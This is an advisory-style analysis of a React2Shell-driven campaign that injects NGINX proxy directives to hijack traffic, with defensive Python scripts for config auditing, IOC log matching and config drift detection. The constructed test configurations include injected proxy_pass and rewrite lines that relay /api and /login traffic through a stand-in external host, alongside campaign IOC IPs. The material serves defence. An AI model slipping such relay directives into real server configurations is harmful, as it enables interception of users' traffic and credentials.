Security researchers at Datadog Security Labs have disclosed an active web traffic hijacking campaign exploiting React2Shell (CVE-2025-55182) to inject malicious configurations into NGINX servers. The campaign silently redirects legitimate traffic through attacker-controlled infrastructure while maintaining normal site functionality to avoid detection.

Campaign overview

| Attribute | Details |
|---|---|
| Vulnerability | CVE-2025-55182 (React2Shell) |
| CVSS score | 10.0 (Critical) |
| Attack type | Configuration injection → traffic hijacking |
| Active period | January 26 - February 2026+ |
| Source IPs observed | 1,083 unique IPs |
| Primary targets | Asian TLDs, government, education |
| Discovery | Datadog Security Labs |
| Published | February 4, 2026 |


Timeline

| Date | Event |
|---|---|
| November 29, 2025 | React2Shell disclosed to React Team |
| December 2025 | CVE-2025-55182 assigned |
| January 2026 | Widespread exploitation begins |
| January 26 - February 2, 2026 | 1,083 unique attacking IPs observed |
| February 4, 2026 | Datadog publishes NGINX hijacking analysis |


Attack methodology

Two-stage attack chain

| Stage | Action |
|---|---|
| 1 | Exploit React2Shell to gain server access |
| 2 | Inject malicious NGINX configuration directives |
| 3 | Traffic silently routed through attacker servers |
| 4 | Cryptomining or reverse shell payloads deployed |


NGINX configuration abuse

| Directive | Malicious use |
|---|---|
| proxy_pass | Redirect traffic to attacker backend |
| rewrite | Modify request URLs |
| proxy_set_header | Preserve headers to avoid detection |
| location blocks | Target specific paths |


Why detection is difficult

| Factor | Impact |
|---|---|
| No NGINX vulnerability | Legitimate features abused |
| Config files rarely audited | Malicious directives overlooked |
| Traffic still reaches destination | User experience unchanged |
| Header preservation | Requests appear normal |


Exploitation statistics

Traffic distribution

| Source | Percentage |
|---|---|
| 193.142.147[.]209 | ~28% |
| 87.121.84[.]24 | ~28% |
| Other IPs (1,081) | ~44% |

Two IP addresses account for 56% of all exploitation attempts two months after React2Shell disclosure.


Payload types observed

| Payload | Description |
|---|---|
| Cryptomining binaries | Downloaded from staging servers |
| Reverse shells | Direct connection to scanner IP |
| Traffic interception | Man-in-the-middle positioning |


Target profile

Geographic targeting

| Region | Targeting intensity |
|---|---|
| India (.in) | High |
| Indonesia (.id) | High |
| Peru (.pe) | Medium |
| Bangladesh (.bd) | Medium |
| Thailand (.th) | Medium |


Sector targeting

| Target type | Examples |
|---|---|
| Government (.gov) | State agencies, ministries |
| Education (.edu) | Universities, schools |
| Chinese hosting | Baota (BT) Panel users |


Infrastructure focus

| Platform | Risk level |
|---|---|
| Baota (BT) Panel | High (widely deployed in China) |
| NGINX with RSC | High |
| Next.js deployments | High |


React2Shell vulnerability details

CVE-2025-55182

| Attribute | Details |
|---|---|
| Name | React2Shell |
| Component | React Server Components (RSC) |
| Also affects | Next.js |
| Type | Unsafe deserialization |
| CVSS | 10.0 (Critical) |
| Discoverer | Lachlan Davidson |
| Authentication | None required |


Exploitation mechanism

| Step | Action |
|---|---|
| 1 | Attacker sends crafted serialized payload |
| 2 | Server deserializes without validation |
| 3 | Arbitrary code execution achieved |
| 4 | Full server compromise |


Detection guidance

Configuration indicators

| Indicator | What to look for |
|---|---|
| Unexpected proxy_pass | Unknown backend servers |
| Suspicious rewrite rules | Unusual URL modifications |
| Unknown location blocks | New routing directives |
| Modified headers | Altered proxy_set_header |

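The directive-abuse table and the configuration indicators above reduce to one check an operator can automate: every place a configuration hands traffic to another host must point at a backend the operator recognizes. The script below is an added example, not Datadog's or NGINX's own tooling. It tokenizes an nginx.conf, resolves upstream names, and flags every `proxy_pass`, upstream `server`, or absolute-URL `rewrite` whose host is not in an operator-maintained allowlist, reporting the enclosing `location` so the injected block can be found quickly. The sample configuration, the allowlist and the 203.0.113.10 backend are constructed for illustration (203.0.113.0/24 is a documentation range, not an address from the campaign).

```python
"""Flag NGINX proxy/rewrite targets whose host is outside a known-backend allowlist.

Added example (not Datadog's or NGINX's tooling). SAMPLE_CONF, ALLOWED_HOSTS
and the 203.0.113.10 host are constructed; 203.0.113.0/24 is a documentation range.
"""
import re
from urllib.parse import urlparse

# Minimal nginx grammar: '#' comments, quoted strings, block delimiters,
# the ';' statement terminator, and bare words (including $variables).
_TOKEN = re.compile(r"""#[^\n]*|"[^"]*"|'[^']*'|[{};]|[^\s{};"']+""")


def parse_nginx(text):
    """Return (context, directive, args) triples in document order.

    context is the tuple of enclosing block headers, e.g.
    ('http', 'server', 'location /api/').
    """
    tokens = [t for t in _TOKEN.findall(text) if not t.startswith('#')]
    entries, stack, words = [], [], []
    for tok in tokens:
        if tok == ';':
            if words:
                entries.append((tuple(stack), words[0], words[1:]))
            words = []
        elif tok == '{':
            stack.append(' '.join(words))   # the words before '{' name the block
            words = []
        elif tok == '}':
            stack.pop()
            words = []
        else:
            words.append(tok.strip('"\''))
    return entries


def host_of(target):
    """Host part of a proxy_pass / upstream server / rewrite target."""
    if target.startswith('unix:'):          # local socket: keep whole string
        return target
    if '://' in target:                      # URL form used by proxy_pass/rewrite
        return urlparse(target).hostname or target
    if target.startswith('['):               # bracketed IPv6 literal, e.g. [::1]:3000
        return target[1:target.index(']')]
    return target.split('/')[0].split(':')[0]


def audit_config(text, allowed_hosts):
    """Return a finding for every outbound target not in allowed_hosts."""
    entries = parse_nginx(text)
    upstream_names = {ctx[-1].split(None, 1)[1] for ctx, d, a in entries
                      if d == 'server' and ctx and ctx[-1].startswith('upstream ')}
    findings = []
    for ctx, directive, args in entries:
        target = None
        if directive == 'server' and ctx and ctx[-1].startswith('upstream ') and args:
            target = args[0]                 # member of an upstream group
        elif directive == 'proxy_pass' and args and host_of(args[0]) not in upstream_names:
            target = args[0]                 # direct backend (upstreams are checked above)
        elif directive == 'rewrite' and len(args) >= 2 and '://' in args[1]:
            target = args[1]                 # absolute-URL rewrite sends the client elsewhere
        if target is not None and host_of(target) not in allowed_hosts:
            findings.append({'context': ' > '.join(ctx), 'directive': directive,
                             'target': host_of(target)})
    return findings


# Constructed sample: one legitimate upstream plus two injected blocks.
SAMPLE_CONF = """
http {
    upstream app { server 127.0.0.1:3000; }
    server {
        listen 80;
        server_name example.com;
        location / {
            proxy_pass http://app;
            proxy_set_header Host $host;
        }
        # injected: /api is relayed through an external host, headers preserved
        location /api/ {
            proxy_pass http://203.0.113.10/api/;
            proxy_set_header Host $host;
        }
        # injected: absolute-URL rewrite off the site
        location /login { rewrite ^/login(.*)$ http://203.0.113.10/login$1 redirect; }
    }
}
"""
ALLOWED_HOSTS = {'127.0.0.1'}   # operator-maintained list of legitimate backends

if __name__ == '__main__':
    for f in audit_config(SAMPLE_CONF, ALLOWED_HOSTS):
        print(f"{f['context']}: {f['directive']} -> {f['target']}")
```

Run it against the rendered configuration (`nginx -T` prints every included file), not only the top-level nginx.conf, since a dropped-in file under a wildcard `include` is as effective as an edit to the main file. A `proxy_pass` whose host is a `$variable` is reported as well, because a dynamic target cannot be allowlisted statically and deserves a human look.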

Network indicators

| Indicator | Detection method |
|---|---|
| Traffic to 193.142.147[.]209 | Firewall/proxy logs |
| Traffic to 87.121.84[.]24 | Network monitoring |
| Unexpected backend connections | Flow analysis |
| Config file modifications | File integrity monitoring |

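The two listed addresses are both the source of the exploitation attempts and, per the payload table, the endpoint the reverse shells connect back to, so a log match should be rated by direction: an inbound probe from one of them is expected noise on any exposed host, while an outbound connection from a web server to one of them is the behaviour the campaign relies on. The following added example (not Datadog's tooling) refangs the published IOCs and applies that rule to firewall or flow log lines. The `key=value` line format and the log lines themselves are constructed for the demonstration.

```python
"""Match flow/firewall log lines against the campaign's published IPs, rated by direction.

Added example, not Datadog's code. CAMPAIGN_IOCS are the two addresses from the
analysis (defanged as published); SAMPLE_LOG and its key=value format are constructed.
"""
import re

CAMPAIGN_IOCS = ['193.142.147[.]209', '87.121.84[.]24']

# Assumed log format: "<timestamp> src=<ip> dst=<ip> dport=<port> ..."
_LINE = re.compile(r'^(?P<ts>\S+)\s+src=(?P<src>[\d.]+)\s+dst=(?P<dst>[\d.]+)\s+dport=(?P<dport>\d+)')


def refang(ioc):
    """Turn a defanged indicator back into a matchable value."""
    return ioc.replace('[.]', '.').replace('(.)', '.').replace('hxxp', 'http')


def parse_line(line):
    """Return the fields of one log line, or None if it does not match the format."""
    m = _LINE.match(line)
    return m.groupdict() if m else None


def match_iocs(lines, iocs):
    """One hit per line that touches an IOC.

    An IOC as destination means a host on our side initiated the connection
    (reverse shell or relay behaviour), so it is rated higher than an inbound
    probe from the same address.
    """
    wanted = {refang(i) for i in iocs}
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue                          # malformed or unrelated line
        if rec['dst'] in wanted:
            hits.append({'ts': rec['ts'], 'ioc': rec['dst'], 'direction': 'outbound',
                         'local': rec['src'], 'dport': int(rec['dport']), 'severity': 'high'})
        elif rec['src'] in wanted:
            hits.append({'ts': rec['ts'], 'ioc': rec['src'], 'direction': 'inbound',
                         'local': rec['dst'], 'dport': int(rec['dport']), 'severity': 'medium'})
    return hits


def hosts_to_triage(hits):
    """Local addresses that made an outbound connection to an IOC, for incident scoping."""
    return sorted({h['local'] for h in hits if h['direction'] == 'outbound'})


# Constructed sample lines: an inbound probe, an outbound connection from the
# probed host, a normal backend call, an outbound hit from a second host, noise.
SAMPLE_LOG = [
    '2026-02-01T10:12:03Z src=193.142.147.209 dst=10.0.0.5 dport=443 proto=tcp',
    '2026-02-01T10:12:09Z src=10.0.0.5 dst=193.142.147.209 dport=4444 proto=tcp',
    '2026-02-01T10:13:00Z src=10.0.0.5 dst=10.0.0.9 dport=3000 proto=tcp',
    '2026-02-01T10:14:21Z src=10.0.0.7 dst=87.121.84.24 dport=80 proto=tcp',
    'malformed line that should be skipped',
]

if __name__ == '__main__':
    for h in match_iocs(SAMPLE_LOG, CAMPAIGN_IOCS):
        print(f"{h['ts']} {h['severity']:6} {h['direction']:8} local={h['local']} ioc={h['ioc']}")
    print('hosts to triage:', hosts_to_triage(SAMPLE_LOG and match_iocs(SAMPLE_LOG, CAMPAIGN_IOCS)))
```

Blocking the two addresses stops the bulk of the attempts, but a host that already shows an outbound hit needs the configuration audit and process review from the other tables; the block rule does not undo an injected `proxy_pass`.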

Host indicators

| Indicator | Detection method |
|---|---|
| NGINX config changes | Configuration management |
| Cryptominer processes | Process monitoring |
| Reverse shell connections | Network connection audit |
| Unauthorized file writes | File system monitoring |


Indicators of compromise

Network IOCs

| Type | Value |
|---|---|
| IP | 193.142.147[.]209 |
| IP | 87.121.84[.]24 |


Configuration patterns

| Pattern | Risk |
|---|---|
| proxy_pass to unknown hosts | High |
| Encoded/obfuscated directives | Critical |
| New upstream definitions | Medium |
| Modified error pages | Medium |


| Priority | Action |
|---|---|
| Critical | Patch React/Next.js to latest versions |
| Critical | Audit NGINX configurations for unauthorized changes |
| High | Block known malicious IPs |
| High | Review server access logs for exploitation |


Configuration hardening

| Control | Purpose |
|---|---|
| Configuration management | Detect unauthorized changes |
| Git-based config tracking | Version control for nginx.conf |
| Principle of least privilege | Limit config write access |
| Regular config audits | Scheduled reviews |


Monitoring recommendations

| Area | Implementation |
|---|---|
| Config file integrity | AIDE, Tripwire, or osquery |
| Network traffic | Monitor for unexpected backends |
| Process execution | Track child processes from NGINX |
| Resource usage | Detect cryptomining activity |

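The hardening and monitoring tables both come down to knowing what the configuration tree looked like before and noticing when it drifts. The following is an added example in the spirit of the AIDE, Tripwire and osquery controls named above; it is none of those tools and not Datadog's code. It hashes every file under a configuration directory into a baseline, then classifies a later snapshot into added, removed and modified files, which catches both an edited nginx.conf and a new file dropped under a wildcard `include`. The directory layout and the 203.0.113.10 host in the demonstration are constructed (203.0.113.0/24 is a documentation range).

```python
"""Hash-baseline drift detection for an NGINX configuration tree.

Added example, not AIDE/Tripwire/osquery and not Datadog's code. The config tree
built in demo() and the 203.0.113.10 host are constructed for illustration.
"""
import hashlib
import os
import tempfile


def snapshot(root):
    """Map every regular file under root (relative, '/'-separated) to its SHA-256 hex digest."""
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if not os.path.isfile(path):      # skip sockets, broken symlinks, etc.
                continue
            h = hashlib.sha256()
            with open(path, 'rb') as fh:
                for chunk in iter(lambda: fh.read(65536), b''):
                    h.update(chunk)
            rel = os.path.relpath(path, root).replace(os.sep, '/')
            digests[rel] = h.hexdigest()
    return digests


def compare(baseline, current):
    """Classify the drift between two snapshots."""
    old, new = set(baseline), set(current)
    return {
        'added': sorted(new - old),
        'removed': sorted(old - new),
        'modified': sorted(p for p in old & new if baseline[p] != current[p]),
    }


def demo():
    """Baseline a small config tree, tamper with it the way the campaign does, report the drift."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, 'conf.d'))
        files = {   # constructed legitimate tree
            'nginx.conf': 'http {\n    include conf.d/*.conf;\n}\n',
            'conf.d/default.conf': ('server {\n    listen 80;\n'
                                    '    location / { proxy_pass http://127.0.0.1:3000; }\n}\n'),
        }
        for rel, body in files.items():
            with open(os.path.join(root, rel), 'w') as fh:
                fh.write(body)
        baseline = snapshot(root)

        # Simulated unauthorized change: an extra location relaying /api through an
        # external host, plus a dropped-in file the wildcard include loads on reload.
        tampered = files['conf.d/default.conf'].replace(
            '    location /', '    location /api/ { proxy_pass http://203.0.113.10/; }\n    location /')
        with open(os.path.join(root, 'conf.d', 'default.conf'), 'w') as fh:
            fh.write(tampered)
        with open(os.path.join(root, 'conf.d', 'zz-extra.conf'), 'w') as fh:
            fh.write('upstream relay { server 203.0.113.10:80; }\n')

        return compare(baseline, snapshot(root))


if __name__ == '__main__':
    for kind, paths in demo().items():
        print(f'{kind}: {paths}')
```

Keep the baseline off the host (committed next to the configuration in git, or in the monitoring system), since an attacker who can write nginx.conf after remote code execution can just as easily rewrite a baseline stored beside it. Alert on any drift that does not correspond to a change the deployment pipeline made.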

Recommendations

For organizations running NGINX

| Priority | Action |
|---|---|
| Critical | Patch React Server Components/Next.js |
| Critical | Review all NGINX configurations |
| High | Implement configuration change monitoring |
| High | Audit upstream/backend definitions |
| Medium | Review Baota Panel deployments if applicable |


For security teams

| Priority | Action |
|---|---|
| High | Add IOCs to detection systems |
| High | Hunt for configuration anomalies |
| Medium | Review RSC/Next.js asset inventory |
| Medium | Assess Asian TLD exposure |


For DevOps teams

| Priority | Action |
|---|---|
| Critical | Version control all NGINX configs |
| High | Implement change detection alerts |
| High | Restrict config file write permissions |
| Medium | Automate configuration compliance checks |


Context

The React2Shell NGINX hijacking campaign demonstrates how attackers leverage critical vulnerabilities not just for immediate compromise, but to establish persistent traffic interception capabilities. By abusing legitimate NGINX features rather than exploiting NGINX itself, attackers create configurations that evade traditional vulnerability scanning.

The campaign's focus on Asian TLDs and government/education targets suggests potential state-aligned or financially motivated actors seeking either intelligence collection or cryptomining revenue. The dual-payload approach (cryptomining and reverse shells) indicates operators may be monetizing access while maintaining persistent footholds.

The concentration of attack traffic from just two IP addresses (56% of attempts) provides defenders with high-confidence blocking indicators. However, the remaining 1,081 source IPs demonstrate the distributed nature of React2Shell exploitation.

Organizations running React Server Components or Next.js should treat patching as a critical priority. The CVSS 10.0 score reflects the vulnerability's severity: unauthenticated remote code execution with no user interaction required.

For NGINX administrators, this campaign reinforces that configuration files are attack surfaces requiring the same security rigor as application code. Configuration management, version control, and integrity monitoring should be standard practice for production deployments.